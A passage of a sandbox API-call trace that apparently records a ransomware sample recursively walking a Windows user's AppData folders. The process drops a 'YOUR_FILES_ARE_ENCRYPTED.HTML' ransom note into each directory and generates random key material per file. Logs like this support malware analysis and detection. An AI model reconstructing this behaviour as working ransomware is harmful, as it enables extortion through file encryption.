out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xb9574d8, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0xb9574d8, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0xb9574d8, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60fcd0, dwReserved1=0x60fc60, cFileName="..", cAlternateFileName="")) returned 1 [0114.275] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb9574d8, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0xb9574d8, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x5ced6c3b, ftLastWriteTime.dwHighDateTime=0x1d70a81, nFileSizeHigh=0x0, nFileSizeLow=0x1, dwReserved0=0x60fcd0, dwReserved1=0x60fc60, cFileName="Latest.dat", cAlternateFileName="")) returned 1 [0114.275] StrStrIW (lpFirst="Latest.dat", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0114.275] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Vault\\UserProfileRoaming\\Latest.dat") returned 85 [0114.275] PathFindExtensionW (pszPath="Latest.dat") returned=".dat" [0114.275] lstrlenW (lpString=".dat") returned 4 [0114.275] PathFindExtensionW (pszPath="Latest.dat") returned=".dat" [0114.275] SystemFunction036 (in: RandomBuffer=0x19e16c, RandomBufferLength=0x20 | out: RandomBuffer=0x19e16c) returned 1 [0114.275] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Vault\\UserProfileRoaming\\Latest.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\vault\\userprofileroaming\\latest.dat"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x324 [0114.275] GetFileSizeEx (in: hFile=0x324, lpFileSize=0x19e190 | out: lpFileSize=0x19e190*=1) returned 1 [0114.275] CloseHandle (hObject=0x324) returned 1 [0114.275] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb9574d8, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0xb9574d8, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x5ced6c3b, ftLastWriteTime.dwHighDateTime=0x1d70a81, nFileSizeHigh=0x0, nFileSizeLow=0x1, dwReserved0=0x60fcd0, dwReserved1=0x60fc60, cFileName="Latest.dat", cAlternateFileName="")) returned 0 [0114.275] FindClose (in: hFindFile=0x626bb8 | out: hFindFile=0x626bb8) returned 1 [0114.275] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Vault\\UserProfileRoaming\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 104 [0114.275] GetProcessHeap () returned 0x600000 [0114.275] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d77d0 [0114.276] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Vault\\UserProfileRoaming\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\vault\\userprofileroaming\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x31c [0114.276] WriteFile (in: hFile=0x31c, lpBuffer=0x6d77d0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e490, lpOverlapped=0x0 | out: lpBuffer=0x6d77d0*, lpNumberOfBytesWritten=0x19e490*=0x3c00, lpOverlapped=0x0) returned 1 [0114.277] CloseHandle (hObject=0x31c) returned 1 [0114.277] GetProcessHeap () returned 0x600000 [0114.277] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d77d0 | out: hHeap=0x600000) returned 1 [0114.277] GetProcessHeap () returned 0x600000 [0114.277] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x314b010 | out: hHeap=0x600000) returned 1 [0114.278] FindNextFileW (in: hFindFile=0x6268b8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xb9574d8, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0xb9574d8, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0xb9574d8, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="UserProfileRoaming", cAlternateFileName="USERPR~1")) returned 0 [0114.278] FindClose (in: hFindFile=0x6268b8 | out: hFindFile=0x6268b8) returned 1 [0114.278] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Vault\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 85 [0114.278] GetProcessHeap () returned 0x600000 [0114.278] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d77d0 [0114.278] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Vault\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\vault\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x320 [0114.280] WriteFile (in: hFile=0x320, lpBuffer=0x6d77d0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e7a4, lpOverlapped=0x0 | out: lpBuffer=0x6d77d0*, lpNumberOfBytesWritten=0x19e7a4*=0x3c00, lpOverlapped=0x0) returned 1 [0114.281] CloseHandle (hObject=0x320) returned 1 [0114.281] GetProcessHeap () returned 0x600000 [0114.281] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d77d0 | out: hHeap=0x600000) returned 1 [0114.281] GetProcessHeap () returned 0x600000 [0114.281] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x313b008 | out: hHeap=0x600000) returned 1 [0114.282] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3cefc6a2, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x50827cc5, ftLastAccessTime.dwHighDateTime=0x1d70a81, ftLastWriteTime.dwLowDateTime=0x50827cc5, ftLastWriteTime.dwHighDateTime=0x1d70a81, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e94c, dwReserved1=0x39f712c, cFileName="Windows", cAlternateFileName="")) returned 1 [0114.282] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x87ca06a1, ftCreationTime.dwHighDateTime=0x1d7006c, ftLastAccessTime.dwLowDateTime=0x87ca06a1, ftLastAccessTime.dwHighDateTime=0x1d7006c, ftLastWriteTime.dwLowDateTime=0x87ca06a1, ftLastWriteTime.dwHighDateTime=0x1d7006c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e94c, dwReserved1=0x39f712c, cFileName="Windows Live", cAlternateFileName="WINDOW~2")) returned 1 [0114.282] StrStrIW (lpFirst="Windows Live", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0114.282] wnsprintfW (in: pszDest=0x6c47b8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows Live") returned 62 [0114.282] GetProcessHeap () returned 0x600000 [0114.282] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x313b008 [0114.284] lstrcpyW (in: lpString1=0x313b008, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows Live" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows Live") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows Live" [0114.284] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows Live", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows Live\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows Live\\*" [0114.284] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows Live\\*", lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x87ca06a1, ftCreationTime.dwHighDateTime=0x1d7006c, ftLastAccessTime.dwLowDateTime=0x87ca06a1, ftLastAccessTime.dwHighDateTime=0x1d7006c, ftLastWriteTime.dwLowDateTime=0x87ca06a1, ftLastWriteTime.dwHighDateTime=0x1d7006c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName=".", cAlternateFileName="")) returned 0x6267b8 [0114.284] FindNextFileW (in: hFindFile=0x6267b8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x87ca06a1, ftCreationTime.dwHighDateTime=0x1d7006c, ftLastAccessTime.dwLowDateTime=0x87ca06a1, ftLastAccessTime.dwHighDateTime=0x1d7006c, ftLastWriteTime.dwLowDateTime=0x87ca06a1, ftLastWriteTime.dwHighDateTime=0x1d7006c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="..", cAlternateFileName="")) returned 1 [0114.284] FindNextFileW (in: hFindFile=0x6267b8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x87ca06a1, ftCreationTime.dwHighDateTime=0x1d7006c, ftLastAccessTime.dwLowDateTime=0x66f63801, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x66f63801, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="Bici", cAlternateFileName="")) returned 1 [0114.284] StrStrIW (lpFirst="Bici", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0114.284] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows Live\\Bici") returned 67 [0114.284] GetProcessHeap () returned 0x600000 [0114.284] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x314b010 [0114.285] lstrcpyW (in: lpString1=0x314b010, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows Live\\Bici" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows Live\\Bici") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows Live\\Bici" [0114.285] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows Live\\Bici", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows Live\\Bici\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows Live\\Bici\\*" [0114.285] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows Live\\Bici\\*", lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x87ca06a1, ftCreationTime.dwHighDateTime=0x1d7006c, ftLastAccessTime.dwLowDateTime=0x66f63801, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x66f63801, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6401a6, dwReserved1=0x640128, cFileName=".", cAlternateFileName="")) returned 0x626978 [0114.285] FindNextFileW (in: hFindFile=0x626978, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x87ca06a1, ftCreationTime.dwHighDateTime=0x1d7006c, ftLastAccessTime.dwLowDateTime=0x66f63801, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x66f63801, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6401a6, dwReserved1=0x640128, cFileName="..", cAlternateFileName="")) returned 1 [0114.285] FindNextFileW (in: hFindFile=0x626978, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x87ca06a1, ftCreationTime.dwHighDateTime=0x1d7006c, ftLastAccessTime.dwLowDateTime=0x66f63801, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x66f63801, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6401a6, dwReserved1=0x640128, cFileName="..", cAlternateFileName="")) returned 0 [0114.285] FindClose (in: hFindFile=0x626978 | out: hFindFile=0x626978) returned 1 [0114.285] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows Live\\Bici\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 97 [0114.285] GetProcessHeap () returned 0x600000 [0114.285] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d77d0 [0114.286] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows Live\\Bici\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows live\\bici\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x31c [0114.286] WriteFile (in: hFile=0x31c, lpBuffer=0x6d77d0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e490, lpOverlapped=0x0 | out: lpBuffer=0x6d77d0*, lpNumberOfBytesWritten=0x19e490*=0x3c00, lpOverlapped=0x0) returned 1 [0114.287] CloseHandle (hObject=0x31c) returned 1 [0114.287] GetProcessHeap () returned 0x600000 [0114.287] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d77d0 | out: hHeap=0x600000) returned 1 [0114.287] GetProcessHeap () returned 0x600000 [0114.287] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x314b010 | out: hHeap=0x600000) returned 1 [0114.288] FindNextFileW (in: hFindFile=0x6267b8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x87ca06a1, ftCreationTime.dwHighDateTime=0x1d7006c, ftLastAccessTime.dwLowDateTime=0x66f63801, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x66f63801, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="Bici", cAlternateFileName="")) returned 0 [0114.288] FindClose (in: hFindFile=0x6267b8 | out: hFindFile=0x6267b8) returned 1 [0114.288] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows Live\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 92 [0114.288] GetProcessHeap () returned 0x600000 [0114.288] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d77d0 [0114.288] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows Live\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows live\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x320 [0114.289] WriteFile (in: hFile=0x320, lpBuffer=0x6d77d0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e7a4, lpOverlapped=0x0 | out: lpBuffer=0x6d77d0*, lpNumberOfBytesWritten=0x19e7a4*=0x3c00, lpOverlapped=0x0) returned 1 [0114.290] CloseHandle (hObject=0x320) returned 1 [0114.290] GetProcessHeap () returned 0x600000 [0114.290] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d77d0 | out: hHeap=0x600000) returned 1 [0114.290] GetProcessHeap () returned 0x600000 [0114.290] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x313b008 | out: hHeap=0x600000) returned 1 [0114.291] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3cefc6a2, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x3d0c63cd, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x377dee7, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e94c, dwReserved1=0x39f712c, cFileName="Windows Sidebar", cAlternateFileName="WINDOW~1")) returned 1 [0114.291] StrStrIW (lpFirst="Windows Sidebar", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0114.291] wnsprintfW (in: pszDest=0x6c47b8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows Sidebar") returned 65 [0114.291] GetProcessHeap () returned 0x600000 [0114.291] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x313b008 [0114.292] lstrcpyW (in: lpString1=0x313b008, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows Sidebar" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows Sidebar") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows Sidebar" [0114.292] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows Sidebar", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows Sidebar\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows Sidebar\\*" [0114.292] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows Sidebar\\*", lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3cefc6a2, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x3d0c63cd, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x377dee7, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName=".", cAlternateFileName="")) returned 0x626a38 [0114.292] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3cefc6a2, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x3d0c63cd, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x377dee7, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="..", cAlternateFileName="")) returned 1 [0114.292] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3cefc6a2, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x3cefc6a2, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0xd9eaaa, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="Gadgets", cAlternateFileName="")) returned 1 [0114.292] StrStrIW (lpFirst="Gadgets", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0114.292] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows Sidebar\\Gadgets") returned 73 [0114.292] GetProcessHeap () returned 0x600000 [0114.292] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x314b010 [0114.292] lstrcpyW (in: lpString1=0x314b010, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows Sidebar\\Gadgets" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows Sidebar\\Gadgets") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows Sidebar\\Gadgets" [0114.293] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows Sidebar\\Gadgets", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows Sidebar\\Gadgets\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows Sidebar\\Gadgets\\*" [0114.293] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows Sidebar\\Gadgets\\*", lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3cefc6a2, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x3cefc6a2, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0xd9eaaa, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6401ac, dwReserved1=0x640128, cFileName=".", cAlternateFileName="")) returned 0x6265b8 [0114.293] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3cefc6a2, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x3cefc6a2, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0xd9eaaa, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6401ac, dwReserved1=0x640128, cFileName="..", cAlternateFileName="")) returned 1 [0114.293] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3cefc6a2, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x3cefc6a2, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0xd9eaaa, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6401ac, dwReserved1=0x640128, cFileName="..", cAlternateFileName="")) returned 0 [0114.293] FindClose (in: hFindFile=0x6265b8 | out: hFindFile=0x6265b8) returned 1 [0114.293] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows Sidebar\\Gadgets\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 103 [0114.293] GetProcessHeap () returned 0x600000 [0114.293] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d77d0 [0114.293] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows Sidebar\\Gadgets\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows sidebar\\gadgets\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x31c [0114.294] WriteFile (in: hFile=0x31c, lpBuffer=0x6d77d0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e490, lpOverlapped=0x0 | out: lpBuffer=0x6d77d0*, lpNumberOfBytesWritten=0x19e490*=0x3c00, lpOverlapped=0x0) returned 1 [0114.295] CloseHandle (hObject=0x31c) returned 1 [0114.295] GetProcessHeap () returned 0x600000 [0114.295] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d77d0 | out: hHeap=0x600000) returned 1 [0114.295] GetProcessHeap () returned 0x600000 [0114.295] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x314b010 | out: hHeap=0x600000) returned 1 [0114.296] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3d053a9f, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x3d053a9f, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x973d55c1, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x50, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="settings.ini", cAlternateFileName="")) returned 1 [0114.296] StrStrIW (lpFirst="settings.ini", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0114.296] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows Sidebar\\settings.ini") returned 78 [0114.296] PathFindExtensionW (pszPath="settings.ini") returned=".ini" [0114.296] lstrlenW (lpString=".ini") returned 4 [0114.296] PathFindExtensionW (pszPath="settings.ini") returned=".ini" [0114.296] SystemFunction036 (in: RandomBuffer=0x19e480, 